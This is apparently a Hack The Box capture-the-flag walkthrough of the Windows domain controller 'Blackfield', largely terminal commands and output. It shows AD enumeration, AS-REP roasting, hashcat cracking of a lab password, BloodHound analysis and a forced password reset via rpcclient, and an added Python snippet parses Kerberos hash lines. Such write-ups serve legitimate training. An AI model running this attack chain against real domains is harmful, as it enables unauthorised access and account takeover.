Blackfield

This is a Windows machine from Hack The Box.

Nmap scan

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:19 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.28 seconds
                                                                                                                                                           
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA -Pn blackfield 10.10.10.192
Output filename begins with '-'. Try '-oA ./-Pn' if you really want it to be named as such.
QUITTING!
                                                                                                                                                           
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:20 EDT
Nmap scan report for 10.10.10.192
Host is up (0.35s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-10 08:20:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-10T08:21:08
|_  start_date: N/A
|_clock-skew: 7h00m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.68 seconds
                                                                

Using crackmapexec on 445.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192-u "" up ""
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

Checking shares.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

┌──(kali㉿kali)-[~/HTB/blackfield]

Add blackfield.local to the hosts file.

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local

Try ldapsearch: ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts, then ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'

No names come back.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=BLACKFIELD,DC=local
namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 


Tried again without the grep.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub                                                                                          
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

Trying rpcclient, a null session gets us in, but the commands we check are access denied.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 
^C

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient $> netsharenum
command not found: netsharenum
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $> 


Trying GetNPUsers.py.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'blackfield.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

Did a full nmap scan.

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ nmap -p- -T4 -oA full 10.10.10.192 -Pn 

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:55 EDT
Nmap scan report for blackfield.local (10.10.10.192)
Host is up (0.34s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 564.16 seconds

Checked SMB shares.

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient -L //10.10.10.192
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

There is a share called forensic. We can try to check it recursively with

smbclient //10.10.10.192/forensic -U ""%""

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient //10.10.10.192/forensic -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/Forest]

Tried enum4linux, no luck.

┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.10.10.192

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Sep  9 23:03:37 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.192
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.192 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.192 )===================================


[+] Server 10.10.10.192 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.192 )================================

Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.192 )=================================

do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)                                           

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.192                                                                         
                                                                                                                     
enum4linux complete on Sat Sep  9 23:04:04 2023                                                                      


Checked the profiles$ share: smbclient \\10.10.10.192\profiles$ -U ''

                                                                                                                    
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient \\\\10.10.10.192\\profiles$ -U ''    
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
  ACheretei                           D        0  Wed Jun  3 12:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
  AHigchens                           D        0  Wed Jun  3 12:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
  AKlado                              D        0  Wed Jun  3 12:47:11 2020

Outputting all these to a users.txt file.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ more users.txt   
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020

Cleaned the file so that only the username is left: awk '{print $1}' users.txt > cleaned_users.txt

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ awk '{print $1}' users.txt > cleaned_users.txt

                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nano cleaned_users.txt 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
blackfield.gnmap  blackfield.nmap  blackfield.xml  cleaned_users.txt  kerbrute  users.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

Added "administrator" to the text file, then used kerbrute to see which usernames are valid.

 ./kerbrute userenum --dc 10.10.10.192 -d  blackfield.LOCAL cleaned_users.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/09/23 - Ronnie Flathers @ropnop

2023/09/09 23:24:27 >  Using KDC(s):
2023/09/09 23:24:27 >   10.10.10.192:88

2023/09/09 23:24:33 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:24:50 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:27:01 >  [+] VALID USERNAME:       [email protected]
2023/09/09 23:27:01 >  [+] VALID USERNAME:       [email protected]


We get the users audit2020, support and svc_backup.

We try GetNPUsers.py blackfield.LOCAL/audit2020 and the same for the other users.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/audit2020                                  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate audit2020, getting its TGT
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/support  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate support, getting its TGT
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/svc_backup
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_backup, getting its TGT
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

We get a hash for support. We try to crack it with hashcat.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd ~/usr/bin                                
cd: no such file or directory: /home/kali/usr/bin
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd /usr/bin 
                                                                                                                     
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less


Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX

Copy the hash to a file.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cat blackfield
$krb5asrep$23$[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ clear

Tried cracking with hashcat; it cracked as #00^BlackKnight.


┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/blackfield/blackfield /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab:#00^BlackKnight
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:3c5c336ce929...a1f2ab
Time.Started.....: Sat Sep  9 23:39:08 2023 (30 secs)
Time.Estimated...: Sat Sep  9 23:39:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   465.6 kH/s (2.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 73%

Started: Sat Sep  9 23:39:06 2023
Stopped: Sat Sep  9 23:39:39 2023
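As an added example that is not part of the original writeup, the Python below splits a hashcat mode 18200 line like the one above into its fields and decodes the userAccountControl bit that GetNPUsers.py reports as UF_DONT_REQUIRE_PREAUTH, which is what made the support account roastable and the others not. The hash line, the account list and the realm spelling in it are constructed for the example.

```python
"""Added example, not from the original writeup: parse a hashcat mode 18200
(Kerberos 5 etype 23 AS-REP) line and decode the userAccountControl bit that
GetNPUsers.py reports as UF_DONT_REQUIRE_PREAUTH.

Everything below (the hash line, the account list, the realm spelling) is
constructed for the example; nothing is cracked or sent over the network.
"""
import re

# userAccountControl bits (MS-SAMR / MS-ADTS).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Mode 18200 layout, as printed by `hashcat --example-hashes` and produced by
# GetNPUsers.py:  $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex enc-part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep_line(line):
    """Split an AS-REP roast line into its fields and sanity-check them.

    For etype 23 (RC4-HMAC) the part before the second '$' is the 16-byte
    HMAC-MD5 checksum that a cracker verifies each candidate against, and the
    part after it is the RC4-encrypted EncASRepPart. Raises ValueError if the
    line does not have that shape.
    """
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype = int(m.group("etype"))
    if etype != 23:
        raise ValueError(f"etype {etype} is not RC4-HMAC; mode 18200 only covers etype 23")
    try:
        edata = bytes.fromhex(m.group("edata"))
    except ValueError as exc:
        raise ValueError("encrypted part is not valid hex") from exc
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": bytes.fromhex(m.group("checksum")),
        "edata_len": len(edata),
    }


def decode_uac(uac):
    """Return the two flags that decide whether an account can be AS-REP roasted."""
    return {
        "disabled": bool(uac & UF_ACCOUNTDISABLE),
        "dont_require_preauth": bool(uac & UF_DONT_REQUIRE_PREAUTH),
    }


def roastable_accounts(accounts):
    """Names of enabled accounts whose UAC has DONT_REQUIRE_PREAUTH set.

    `accounts` maps sAMAccountName -> userAccountControl (an integer, as read
    from LDAP). This is the property GetNPUsers.py probes per user: an account
    it reports as "doesn't have UF_DONT_REQUIRE_PREAUTH set" is not in this list.
    """
    found = []
    for name, uac in accounts.items():
        flags = decode_uac(uac)
        if flags["dont_require_preauth"] and not flags["disabled"]:
            found.append(name)
    return sorted(found)


# Constructed sample line: realistic shape, made-up bytes.
SAMPLE_LINE = (
    "$krb5asrep$23$support@BLACKFIELD.LOCAL:" + "ab" * 16 + "$" + "cd" * 40
)

# Constructed UAC values for the accounts kerbrute found valid, plus one
# disabled account to show that the disabled bit takes it out of scope.
SAMPLE_UAC = {
    "audit2020": UF_NORMAL_ACCOUNT,
    "support": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
    "svc_backup": UF_NORMAL_ACCOUNT,
    "old_svc": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
}

if __name__ == "__main__":
    fields = parse_asrep_line(SAMPLE_LINE)
    print(f"{fields['user']}@{fields['realm']}: etype {fields['etype']}, "
          f"{fields['edata_len']} bytes of encrypted data")
    print("roastable:", roastable_accounts(SAMPLE_UAC))
```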

Try crackmapexec with the support credentials and we get the shares.

└─$ crackmapexec smb 10.10.10.192 --shares -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

Let's try WinRM, no luck.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm  10.10.10.192 -u support -p '#00^BlackKnight' 
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\support:#00^BlackKnight
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

Try rpcclient with the support credentials, then enumerate the domain users with enumdomusers and we get a bunch of usernames.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]
user:[BLACKFIELD840481] rid:[0x458]
user:[BLACKFIELD622501] rid:[0x459]
user:[BLACKFIELD787464] rid:[0x45a]
user:[BLACKFIELD163183] rid:[0x45b]
user:[BLACKFIELD869335] rid:[0x45c]
user:[BLACKFIELD319016] rid:[0x45d]


We output this to a file and clean it so we only have the usernames. Then we go through each user with the bash loop below.
while read -r user; do
    ./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt

We get the output below, with no hash, so no luck.


Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD764430
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD538365
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD189208
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BLACKFIELD404458
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

We try a Python script, bloodhound.py. I want to use BloodHound 3, so we install as below.

Bloodhound.py does the same job as SharpHound but runs from the Linux machine, and it generates JSON that we can import into BloodHound.

pip install BloodHound==1.1.1

Add the directory to the PATH.

export PATH=$PATH:/home/kali/.local/bin

We then run the command: bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 01M 12S
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  20230910090640_users.json  blackfield.nmap    cleanusers2.txt  users.txt
20230910090640_domains.json    blackfield                 blackfield.xml     kerbrute
20230910090640_groups.json     blackfield.gnmap           cleaned_users.txt  users2.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

We start neo4j and BloodHound and load these files.

neo4j

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo neo4j console                                               
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
Active database: graph.db
Directories in use:
  home:         /var/lib/neo4j
  config:       /etc/neo4j
  logs:         /var/log/neo4j
  plugins:      /var/lib/neo4j/plugins
  import:       /var/lib/neo4j/import
  data:         /var/lib/neo4j/data
  certificates: /var/lib/neo4j/certificates
  run:          /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-10 13:10:15.848+0000 INFO  ======== Neo4j 3.5.35 ========
2023-09-10 13:10:15.891+0000 INFO  Starting...
2023-09-10 13:10:20.194+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2023-09-10 13:10:23.362+0000 INFO  Started.
2023-09-10 13:10:25.396+0000 INFO  Remote interface available at http://localhost:7474/
2023-09-10 13:10:47.620+0000 WARN  The client is unauthorized due to authentication failure.

bloodhound

└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-linux-x64
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound              icudtl.dat    libvk_swiftshader.so    locales            swiftshader
chrome_100_percent.pak  libEGL.so     libvulkan.so            resources          v8_context_snapshot.bin
chrome_200_percent.pak  libffmpeg.so  LICENSE                 resources.pak      version
chrome-sandbox          libGLESv2.so  LICENSES.chromium.html  snapshot_blob.bin  vk_swiftshader_icd.json
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound                                                              
(node:358673) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

I am going to try aclpwn to see what I can get after loading the data into BloodHound.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ~/.local/bin/aclpwn -f [email protected] -t blackfield.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.192 -sp '#00^BlackKnight' 
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]

Manually looking through BloodHound, we see that support can change the password for AUDIT2020.

[BloodHound screenshot: Pasted image 20230910213306.png]

We can change the password from rpcclient using this command I got from ChatGPT: rpcclient $> setuserinfo2 [username] 23 '[newpassword]'

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:
rpcclient $> setuserinfo2 audit2020 23 'Password123!'
rpcclient $> 


We try crackmapexec: SMB authenticates, but no luck on WinRM.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192 -u audit2020 -p 'Password123!'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password123! 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password123!'
SMB         10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\audit2020:Password123!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
